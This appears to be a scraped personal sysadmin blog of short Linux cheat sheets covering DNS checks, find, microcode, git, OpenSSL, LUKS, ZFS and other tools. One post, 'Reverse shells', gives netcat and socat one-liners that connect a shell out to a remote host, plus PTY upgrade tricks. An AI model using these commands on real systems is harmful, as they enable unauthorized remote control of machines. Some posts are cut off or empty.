Zonemaster
December 8, 2018 — 17:52

Author: silver  Category: linux  Comments: 0

Zonemaster is an Open source DNS validation tool

Source: https://github.com/zonemaster/zonemaster
Hosted: https://www.zonemaster.net/domain_check

Install Perl modules

Dependencies:

cpanm File::ShareDir cpanm File::Slurp Hash::Merge IO::Socket::INET6 List::MoreUtils Mail::RFC822::Address Module::Find Moose Net::IP Readonly::XS Text::CSV Devel::CheckLib

Zonemaster LDNS and Engine:

cpanm Zonemaster::LDNS
cpanm Zonemaster::Engine

Test

time perl -MZonemaster::Engine -e 'print map {"$_\n"} Zonemaster::Engine->test_module("BASIC", "zonemaster.net")'

Install Perl modules

Dependencies:

cpanm MooseX::Getopt Text::Reflow Module::Install

Zonemaster CLI:

cpanm Zonemaster::CLI

Examples

zonemaster-cli --test basic zonemaster.net
zonemaster-cli --no-ipv6 --show_level --show_module --progress --level INFO --test Syntax example.com
GNU find
March 30, 2018 — 14:51

Author: silver  Category: linux windows  Comments: 0

Just a few useful ‘find’ examples

Exclude:

find . -path ./foo -prune -o -name bar
find /home \( -path /usr/data -prune -o -path /usr/src \) -prune -o -name foo -print
find . -name Makefile -not -path foo
find . -type d ! -regex .*\/\(foo\|bar\).* \;

Permissions:

find . -perm -775
find . -perm /u+w,g+
find . -printf "%m:%f\n"
find . -printf "%m %h/%f\n"|grep -v '^\(644\|755\)'

Print date:

find -type f -printf '%TF %.8TT %p\n'

Windows:

find.exe . -name *.exe -exec certutil -hashfile {} SHA512 ; >c:\hash.txt

Updating CPU Microcode
March 28, 2018 — 12:50

Author: silver  Category: linux windows  Comments: 0

BITS

Tool from Intel called “BIOS Implementation Test Suite” that can do several things including handling microcode:
https://biosbits.org
https://github.com/biosbits/bits
https://github.com/mkorthof/bits

Linux

  • load/update microcode using pkg:
  • load/update intel microcode manually:
    - get latest tgz from intel: see below
    - backup/copy files: /lib/firmware/intel-ucode
    - check kernel config: grep MICROCODE /boot/config-*
    - run iucode_tool:

    /usr/sbin/iucode_tool -tb -lS /lib/firmware/intel-ucode/*

    - update initramfs: update-initramfs -u -k all

  • reloading microcode:
    echo 1 > /sys/devices/system/cpu/microcode/reload
    or: rmmod cpuid; modprobe cpuid

  • show version:
    dmesg | grep microcode or: grep microcode /proc/cpuinfo

  • skip loading microde on boot:
    add to grub cmdline: dis_ucode_ldr

Windows

Microsoft includes certain microcode updates in Windows CPU’s. For example: KB4090007, KB3064209, KB2970215.

Get Microcode

Download the latest version from Intel:
https://downloadcenter.intel.com/download/27431/Linux-Processor-Microcode-Data-File?v=t.

Magic SysRq Key
November 25, 2017 — 22:19

Author: silver  Category: linux  Comments: 0

How to use SysRq (Print Screen key)

( “REISUB” )

enable:

echo 1 > proc/sys/kernel/sysrq

permanently:

/etc/sysctl.d/local.conf
kernel.sysrq=1

To BREAK: CTRL+PAUSE (Serial)

ALT+SysReq+KEY
When logged in using SSH the SysRq may be accessible by writing to /proc/sysrq-trigger
echo s > /proc/sysrq-trigger

useful options:

  • b: Immediately reboot the system, without unmounting or syncing filesystems
    echo b > proc/sysrq-trigger
  • e: Send the SIGTERM signal to all processes except init (PID 1)
  • f: Call oom_kill, which kills a process to alleviate an OOM condition:
  • s: Sync all mounted filesystems:
  • t: Output a list of current tasks and their information to the console:
  • u: Remount all mounted filesystems in read-only mode
  • w: Display list of blocked (D state) tasks
  • space: Print a summary of available magic SysRq keys

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/plain/Documentation/admin-guide/sysrq.rst
https://en.wikipedia.org/wiki/Magic_SysRq_key

GoAccess
November 25, 2017 — 18:04

Author: silver  Category: linux web  Comments: 0

GoAccess is a “real-time web log analyzer” which can output in CLI or HTML (like webalizer, awstats and piwik etc). It works out of the box with Apache, for lighttpd you probably need to specify the log format. Examples below are for lighttpd. Run “goaccess /var/log/httpd/access.log” without any other arguments and it will ask for the log format and drop you into the Dashboard (text based gui).

CLI

no conf, just arguments:

goaccess /var/log/lighttpd/access.log \
--date-format=%d/%b/%Y \
--time-format='%T %z' \
--log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"'

-or-

change /etc/goaccess.conf:

date-format %d/%b/%Y:%T %z
log-format %h %v %e [%d] "%r" %s %b "%R" "%u"

HTML

Output to “static” html file.

current log:

goaccess /var/log/lighttpd/access.log \
  --date-format=%d/%b/%Y \
  --time-format='%T %z' \
  --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
  --output=/var/www/html/goaccess.html

use all logs:

zcat -f /var/log/lighttpd/access.log*gz | goaccess \
  --date-format=%d/%b/%Y \
  --time-format='%T %z' \
  --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
  --ignore-crawlers \
  --with-output-resolver \
  -e 127.0.0.1 -e ::1 -e exclude.example.com
  --output=/var/www/html/goaccess.html

Server

The last option is to run it as Server using WebSocket. This allows it to:

  • output realtime HTML: --real-time-html
  • run as daemon: --daemonize
  • use FIFO: --fifo-in= --fifo-out=
  • use HTTPS: --ssl-cert= --ssl-key= --ws-url=wss://url

live log:

goaccess /var/log/lighttpd/access.log \
 --date-format=%d/%b/%Y \
 --time-format='%T %z' \
 --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
 --output=/var/www/html/goaccess.html \
 --real-time-html \
 --ssl-cert=//etc/ssl/certs/cert.pem \
 --ssl-key=/etc/ssl/private/privkey.pem --ws-url=wss://example.com:7890

Now https://example.com/goaccess.html should should a live Dashboard (tcp port 7890 needs to be open for client).

perf
August 23, 2017 — 16:45

Author: silver  Category: linux  Comments: 0

perf – performance analysis tools for Linux

Start with:

perf top
perf bench all

Example:

To find out why “kworker” process (kernel per-cpu threads) has high CPU usage:

  • record 10 seconds of backtraces on all CPUs to perf.data:
    perf record -g -a sleep 10

  • analyse recording:
    perf report

More info:
https://www.brendangregg.com/perf.html
https://askubuntu.com/questions/33640/kworker-what-is-it-and-why-is-it-hogging-so-much-cpu

Debian
August 23, 2017 — 15:37

Author: silver  Category: linux  Comments: 0

Remote upgrade using aptitude:

  1. echo “defscrollback 10000” >>/root/.screenrc
  2. screen
  3. /etc/sysctl.conf:
    # on kernel panic reboot after 60s
    kernel.panic = 600
    # enable magic sysrq key
    kernel.sysrq=1</pre>
  4. In /etc/apt/sources.list: change old to new dist (or “stable” etc)
    ( if needed: apt-get install debian-archive-keyring )
  5. aptitude update
  6. aptitude safe-upgrade
    ( optionally/if needed: full-upgrade, dist-upgrade )

Change default editor:

sudo update-alternatives --config editor

Install build tools:

apt-get install build-essential

pkg install dates:

for file_list in `ls -rt /var/lib/dpkg/info/*.list`; do \
  stat_result=$(stat --format=%y "$file_list"); \
  printf "%-50s %s\n" $(basename $file_list .list) "$stat_result"; \
done

backports:

apt-get -t stretch-backports install “package”
aptitude -t stretch-backports install “package”

/etc/apt/preferences:

Package: *
Pin: release a=stable
Pin-Priority: 900

Package: *
Pin: release o=Debian
Pin-Priority: -10

“testing” packages:

install a pkg from testing:
sudo apt-get -t testing install tmux
show all testing pkgs:
aptitude search -F "%p %V %v" '?narrow(~i, ~Atesting)
( stable, unstable, oldstable, etc )

apt-get install package=version

ping
March 4, 2017 — 16:01

Author: silver  Category: linux  Comments: 0

When trying to ping as non root user you might get the following error:

ping: icmp open socket: Operation not permitted

There are several ways to fix this:

reinstall pkg (debian):

$ sudo apt-get install --reinstall iputils-ping

(sets cap)

manually set cap:

$ sudo setcap cap_net_raw+ep /bin/ping
$ sudo setcap cap_net_raw+ep /bin/ping6
$ sudo getcap /bin/ping
$ sudo getcap /bin/ping6

needs kernel config:
CONFIG_EXT4_FS_SECURITY=y


dont use SOCK_RAW:

socket(PF_INET, SOCK_DGRAM, PROT_ICMP)

$ cat /proc/sys/net/ipv4/ping_group_range
$ sysctl net.ipv4.ping_group_range
  • “1 0” default, nobody except root
  • “100 100” single group
  • “0 2147483647” everyone (max gid)
$ sysctl net.ipv4.ping_group_range = "0 2147483647"


/etc/sysctl.d/local.conf
net.ipv4.ping_group_range=0 2147483647


suid:

chmod +s /usr/ping
chmod +s /usr/ping6
Linux Audit
March 4, 2017 — 15:43

Author: silver  Category: linux  Comments: 0

First make sure “auditd” is started

add rules:

auditctl -a always,exit -S all -F path=/etc/passwd -F key=config1
auditctl -w /etc/passwd -p rwa -k config2

del rules:

auditctl -d always,exit -S all -F path=/etc/passwd -F key=config1
auditctl -W /etc/passwd -p rwa -k config2

(or restart auditd)

make permanent:

add rules to /etc/audit/rules.d/audit.rules

show results:

ausearch -ts today -k config1
aureport -k

disable audit logs:

systemctl mask systemd-journald-audit.socket
HP ProLiant
December 9, 2016 — 21:54

Author: silver  Category: linux other  Comments: 0

Boot:

  • BIOS: F10
  • HP SSA Smart Storage Administrator / ACU Array Configuration Utility: F5
  • ORCA / Options ROM for Configuring Arrays: Press any key…, F8
  • HP IP: F10
  • Boot Menu: F11

Install HP software:

Repository:

wget http://downloads.linux.hp.com/add_repo.sh
sh add_repo.sh spp -d redhat -r 6.7 -n
sh add_repo.sh spp -d redhat -r 6.7
sh add_repo.sh spp -d redhat -r 5.10 -n
sh add_repo.sh spp -d redhat -r 5.10
sed -i 's/gpgcheck=0/gpgcheck=1/' /etc/yum.repos.d/HP-spp.repo
rpm --import http://downloads.linux.hp.com/SDR/hpPublicKey1024.pub
rpm --import http://downloads.linux.hp.com/SDR/hpPublicKey2048.pub
rpm --import http://downloads.linux.hp.com/SDR/hpPublicKey2048_key1.pub
for i in $( rpm -qa gpg-pubkey* ); do rpm -qi $i |grep -B 8 Hewlett; done
yum install hpacucli
yum install hponcfg

HP Server Management Application and Agents Command Line Interface

# hpasmcli -s "clear iml"

HP Lights-Out Online Configuration Utility for Linux

hponcfg -f Clear_EventLog.xml -i

Clear_EventLog.xml:

<RIBCL VERSION="2.0">
 <LOGIN USER_LOGIN="Administrator" PASSWORD="xxx">
 <RIB_INFO MODE="write">
 <CLEAR_EVENTLOG/>
 </RIB_INFO>
 </LOGIN>
</RIBCL>

Clear_IML.xml:

<RIBCL VERSION="2.0">
  <LOGIN USER_LOGIN="Administrator" PASSWORD="xxx">
  <SERVER_INFO MODE="write">
    <CLEAR_IML/>
  </SERVER_INFO>
  </LOGIN>
</RIBCL>

Administrator_reset_pw.xml:

<ribcl VERSION="2.0">
 <login USER_LOGIN="Administrator" PASSWORD="boguspassword">
  <user_INFO MODE="write">
   <mod_USER USER_LOGIN="Administrator">
    <password value="NewPass123"/>
   </mod_USER>
  </user_INFO>
 </login>
</ribcl>
gnome-keyring
November 26, 2016 — 17:52

Author: silver  Category: linux  Comments: 0

Restart:

gnome-keyring-daemon -r -d

If doesn’t suffice this extra steps might help:

pgrep -f gnome-keyring-daemon
rm -rf ~/.cache/keyring-*
setsid /usr/bin/gnome-keyring-daemon /dev/null 2>&1
ln -s ~/.cache/keyring-* $GNOME_KEYRING_CONTROLA
/usr/bin/gnome-keyring-daemon --start --components=pkcs11
/usr/bin/gnome-keyring-daemon --start --components=gpg
/usr/bin/gnome-keyring-daemon --start --components=ssh
find ~/.cache/ -maxdepth 1 -type l -name 'keyring-*' -delete
sendmail with attachment
November 26, 2016 — 17:48

Author: silver  Category: linux  Comments: 0

Oneliner to send email with attachment using sendmail:

$S Subject
$B Body
$A Attachment


Display man pages as text
November 26, 2016 — 15:51

Author: silver  Category: linux  Comments: 0
man openssl | cat
man -P cat openssl
groff -t -e -mandoc -Tascii manpage.1 | col -bx > manpage.txt
Linux Disk Encryption
November 26, 2016 — 13:04

Author: silver  Category: encryption linux  Comments: 0

Linux Disk Encrption using Device Mapper, cryptsetup frontend and Linux Unified Key Setup LUKS (on disk format).

Setup:

cryptsetup -y -v luksFormat /dev/sdb1
cryptsetup luksOpen /dev/sdb1 foo
cryptsetup status foo -v

Test:

cryptsetup --test-passphrase open /dev/sdb1 # (non-LUKS)
cryptsetup luksOpen --test-passphrase /dev/sdb1
cryptsetup isLuks /dev/sdb1 && echo IMaLUKS
cryptsetup luksDump /dev/sdb1

Change:

(asks current passphase first)

cryptsetup -y luksChangeKey <target device> -S <target key slot number>
cryptsetup -y luksChangeKey /dev/sdb1 -S 1

Or use gui gnome-disks:

  • Disks (gnome-disks)
  • 1.0TB Hard Disk
  • Volumes: “Partition 1 1.0 TB LUKS”
  • Cogs/wheels

Add/remove key:

sudo cryptsetup -y luksAddKey ENCRYPTED_PARTITION
sudo cryptsetup luksRemoveKey ENCRYPTED_PARTITION

Various:

dmsetup ls --tree
lsblk
lsblk --fs
Reverse shells
November 26, 2016 — 12:45

Author: silver  Category: linux  Comments: 0

USING NETCAT:

SERVER/LISTEN:

netcat -lvp 9999

CLIENT:

netcat -e /bin/sh host.name 9999


NICER SHELL:

python -c 'import pty; pty.spawn("/bin/bash")'
( sleep 1; echo 'bla' ) | python -c "import pty; pty.spawn(['/usr/bin/sudo','-S','whoami']);"

 


 

USING SOCAT:

SERVER/LISTEN:

socat file:`tty`,raw,echo=0 tcp-listen:8888

CLIENT:

socat tcp-connect:host.name:8888 exec:'bash -li',pty,stderr,setsid,sigint,sane

CLIENT:

socat tcp:host.name:8888 exec:"bash -li",pty,stderr,setsid,sigint,sane
socat TCP-LISTEN:8888,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
socat FILE:`tty`,raw,echo=0 TCP:1.2.3.4:8888
export STY=
stty rows 40 cols 130
stty rows 40 cols 230
EncFS
November 25, 2016 — 22:02

Author: silver  Category: encryption linux  Comments: 0

Install on CentOS6:

Required packages:

yum install -y fuse-2.8.3-5.el6.x86_64 
yum install -y fuse-libs.x86_64
yum install -y fuse-devel.x86_64
usermod -a -G fuse <your_user>
yum install -y git
yum install -y cmake
yum install -y boost-serialization.x86_64
yum install -y openssl-devel.x86_64
yum install -y rlog-devel.x86_64
yum install -y tinyxml2-devel.x86_64 
yum install -y gettext-devel.x86_64
yum install -y centos-release-scl
yum install -y devtoolset-3-gcc-c++ -y

Compile:

scl enable devtoolset-3 bash
git clone https://github.com/vgough/encfs
cd encfs
mkdir build
cd build
cmake ..
make
make test
make install
make package
mkdir ~/test
mkdir ~/Private

Test:

encfs ~/Private ~/test
echo testing > ~/test/testfile
fusermount -u ~/test
OpenVPN AS
November 25, 2016 — 21:31

Author: silver  Category: encryption linux  Comments: 0

OpenVPN Access Server is quite easy and fast to setup and includes a web gui.

Download:

Configuration:

Clickety click in the gui, plus some hardening:

Server:

Client:

auth SHA512
cipher AES-256-CBC

Connect with SSH + SOCKS Proxy + OTP:

$ ssh -D 1 to remote host

Ban user:

Ban a user from logging into the VPN or Web server
(doesn’t affect a user who is already logged in — for this, use DisconnectUser below):

/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value true UserPropPut

Re-admit a user who was previously banned:

/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value false UserPropPut

Disconnect a user:

/usr/local/openvpn_as/scripts//sacli --user <USER> --key prop_deny --value true UserPropPut

Set client cert keysize:

/usr/local/openvpn_as/scripts/sa --keysize=4096 Init

Generating init scripts:

/usr/local/openvpn_as/scripts/openvpnas_gen_init [--auto]

Google Authenticator:

Unlock a secret:

./sacli -u <USER> --lock 0 GoogleAuthLock

Lock a secret:

./sacli -u <USER> --lock 1 GoogleAuthLock

Generate a new, unlocked secret:

./sacli -u <USER> --lock 0 GoogleAuthRegen

Generate a new, locked secret:

./sacli -u <USER> --lock 1 GoogleAuthRegen

Enable Google Authenticator for all accounts:

./sacli --key vpn.server.google_auth.enable --value true ConfigPut

Enable for 1 user:

./sacli --user <USER_OR_GROUP> --key prop_google_auth --value true UserPropPut

Disable:

./sacli --key vpn.server.google_auth.enable --value false ConfigPut

Disable for 1 user:

./sacli --user <USER_OR_GROUP> --key prop_google_auth --value false UserPropPut

Revoke and reissue secret:

./sacli -u <USER> GoogleAuthRegen

Retrieve current user properties:

./confdba -us -p

Port sharing:

Advanced VPN Settings: port-share 127.0.0.1 10443
(tcp mode only)

OpenSSL
November 25, 2016 — 21:26

Author: silver  Category: encryption linux  Comments: 0

List deleted open files (after update):

lsof | grep -i libssl | grep DEL | awk '{print $1}' | sort | uniq

Generate CSR, self signed cert:

openssl genrsa -out rootCA.key 2048
openssl genrsa -des3 -out rootCA.key 2048
openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 3650 -out rootCA.pem
openssl x509 -req -in server.csr -CA rootCA.pem -CAkey rootCA.key -CAcreateserial -out server.crt -days 3650 -sha256

View CSR

openssl req -in file.csr -noout -text

View cert fingerprint

openssl x509 -fingerprint -noout -in file.crt -sha256
openssl x509 -fingerprint -noout -in file.crt -sha1
openssl x509 -fingerprint -noout -in file.crt -md5

View ciphers:

openssl ciphers -v 'TLSv1' | sort

Test ciphers:

openssl s_client -connect google.com:443 -cipher "EDH"
openssl s_client -connect google.com:443 -cipher "RC4"
openssl s_client -connect google.com:443 -tls1
openssl s_client -connect google.com:443 -tls1_1
openssl s_client -connect google.com:443 -tls1_2
echo -n | openssl s_client -connect google.com:443
nmap --script ssl-enum-ciphers -p 443

Get fingerprint from live SSL cert (IRC):

echo | openssl s_client -connect efnet.port80.se:6697 |& openssl x509 -fingerprint -noout -sha256
echo | gnutls-cli -p 6697 irc.underworld.no --print-cert | sed -n '/-----BEGIN CERT/,/-----END CERT/p' |& openssl x509 -fingerprint -noout -sha256

Show fingerprint:

openssl x509 -in cert.pem -fingerprint -noout

To change the password of your private key:

openssl rsa -des3 -in ca.key -out ca_new.key
mv ca_new.key ca.key

Verifying that a Private Key Matches a Certificate

$ openssl x509 -noout -modulus -in server.pem | openssl md5 ;\
openssl rsa -noout -modulus -in server.key | openssl md5

Get the MD5 fingerprint of a certificate using OpenSSL

openssl dgst -md5 certificate.der

Get the MD5 fingerprint of a CSR using OpenSSL

openssl dgst -md5 csr.der

Debug SMTP/STARTTLS:

openssl s_client -debug -starttls smtp -crlf -connect localhost:25
File Encryption
November 25, 2016 — 18:44

Author: silver  Category: encryption linux  Comments: 0

All of these are FUSE based except for eCryptfs.

Comparison: https://nuetzlich.net/gocryptfs/comparison

 

CryFS
November 25, 2016 — 18:18

Author: silver  Category: encryption linux  Comments: 0

Download:
 
http://cryfs.org
https://github.com/cryfs/cryfs
 
Compile under CentOS 6:
 

yum install https://www.softwarecollections.org/repos/denisarnaud/boost157/epel-6-x86_64/noarch/denisarnaud-boost157-epel-6-x86_64-1-2.noarch.rpm
yum install -y boost157-devel.x86_64 boost157-static.x86_64 
scl enable devtoolset-3 bash
export BOOST_ROOT=/usr/include/boost157
export BOOST_LIBRARYDIR=/usr/lib64/boost157
mkdir cmake && cd cmake
cmake ..
make
sudo make install
Serial console
November 25, 2016 — 17:14

Author: silver  Category: linux  Comments: 0

/etc/default/grub:

GRUB_CMDLINE_LINUX="video=off elevator=deadline console=tty0 console=ttyS0,115200"
GRUB_TERMINAL=serial
GRUB_SERIAL_COMMAND="serial --unit=0 --speed=115200 --stop=1"

/etc/inittab:

0:2345:respawn:/sbin/agetty -8 ttyS0 115200 vt100
Git
November 25, 2016 — 13:07

Author: silver  Category: linux  Comments: 0

Just a little cheatsheet… ;)

Start ssh-agent:

eval $( ssh-agent )
ssh-add /home/user/.ssh/id_ed25519_git
ssh -T [email protected]

Now you should be able to “git push”

New repository, using SSH:

git push origin master
git remote set-url origin [email protected]:username/repo.git
git remote add origin [email protected]:username/repo.git
git add .
git commit -m "First commit"

To change commit comment:

git commit --amend

 


 

Branches:

Clone the repository:

git clone 

List all branches:

git branch -a

Checkout the branch that you want:

git checkout git checkout checkout origin/story/sla_tooling

Adding branches:

git branch
git checkout -b branchname
git push origin branchname
git remote add branchname [email protected]:username/repo.git
git commit .
git push branchname branchname

Switch between branches:

git checkout 
git checkout master

Remove remote (no really harmful):

git remote remove

More details about branches:

Update your branch when the original branch from official repository has been updated :

$ git fetch [name_of_your_remote]

Then you need to apply to merge changes, if your branch is derivated from develop you need to do :

$ git merge [name_of_your_remote]/develop

Delete a branch on your local filesystem :

$ git branch -d [name_of_your_new_branch]

To force the deletion of local branch on your filesystem :

$ git branch -D [name_of_your_new_branch]

Delete the branch on github :

$ git push origin :[name_of_your_new_branch]

 


 

Color:

git diff --color-words
git log --color-words
git show --color-words

 

Undo:

git checkout .  # revert your changes
git clean -fdxn # dry run
git clean -xdf  # delete untracked and ignored files (!!!)

 

SHA Hash:

git hash-object 

(compare to:)
https://api.github.com/repos/user/repos/contents/file
https://api.github.com/repos/user/repos/bobs/hash

 


 

Removing sensitive data:

bfg --delete-files YOUR-FILE-WITH-SENSITIVE-DATA
bfg --replace-text passwords.txt

OR

git filter-branch --force --index-filter \
'git rm --cached --ignore-unmatch PATH-TO-YOUR-FILE-WITH-SENSITIVE-DATA' \
--prune-empty --tag-name-filter cat -- --all

(add to .gitignore)

git push origin --force --all
git push origin --force --tags
git for-each-ref --format='delete %(refname)' refs/original | git update-ref --stdin
git reflog expire --expire=now --all
git gc --prune=now

 

Working state:

Use git stash when you want to record the current state of the working directory and the index, but want to go back to a clean working directory

git stash
git stash list
git stash show
git stash show -p --color

(!) remove all states:

git stash clear

 

List remote:

git ls-remote $URL

 

Versioning:

short commit hash:

git rev-parse --short HEAD
git describe --tags --always --dirty=-dirty

 

Logs:

git log --graph --abbrev-commit --format=format:'%h - %s%d'
git log --oneline 
git log --pretty=oneline --abbrev-commit
git log --abbrev-commit
git log -1 --abbrev-commit
git log -1 --pretty=format:%h 
vi Editor
May 2, 2015 — 21:27

Author: silver  Category: bsd linux  Comments: 0

vimrc:

~/.vimrc

set number
filetype indent on
set expandtab
set shiftwidth=2
set softtabstop=2
syntax on
" set background=light
set background=dark
" colorscheme default

(” = comment)


commands:

:no paste
:set list
:set nolist

reindent:

gg=G


view/start vi readonly:

$ vi -R

xml syntax:

:set filetype=xml
:filetype indent on
gg=G


yl yank (copy) current character
yn yank n characters
yw yank the current word


run external shell command:

:!command
:!ls -la /tmp

:sh


vim visual mode:

visual line: SHIFT+V
visual block: CTRL+V


move code blocks:

on bracket/curley brace/parentheses: %


search history:

same as with ":"
press “/” then “UP” or “DOWN” key


goto column:

use "|<NUMBER>"
e.g. 80| moves to column 80


search:

to search for the word you are on
*
#


case:

to upper case, to lower case
~ (tilde)


bookmark:

set a bookmark called 'a'
ma
go to the bookmark called 'a' (the ` is the key left of 1)
`a

center:

center the screen on your current position
zz


current word:

select the current word (visual)
viw


format json:

:%!python -m json.tool

Speedtest
May 2, 2015 — 21:23

Author: silver  Category: linux  Comments: 0

Download:
https://github.com/sivel/speedtest-cli
https://pypi.python.org/pypi/speedtest-cli/


Use only NL servers:


ZFS
March 21, 2015 — 15:40

Author: silver  Category: bsd linux solaris  Comments: 0

New zpool:

zpool create data /dev/aacd0p1.eli
zpool add data cache ada1p2
zpool add data log ada1p1

Tuning (bsd):

zboot/loader.conf
/boot/loader.conf

zfs_load="YES"

# 1G:

vm.kmem_size_max="1073741824"
vm.kmem_size="1073741824"

# 330M:

vm.kmem_size="330M"
vm.kmem_size_max="330M"


vfs.zfs.arc_max="40M"
vfs.zfs.vdev.cache.size="5M"

Send/receive using SSH: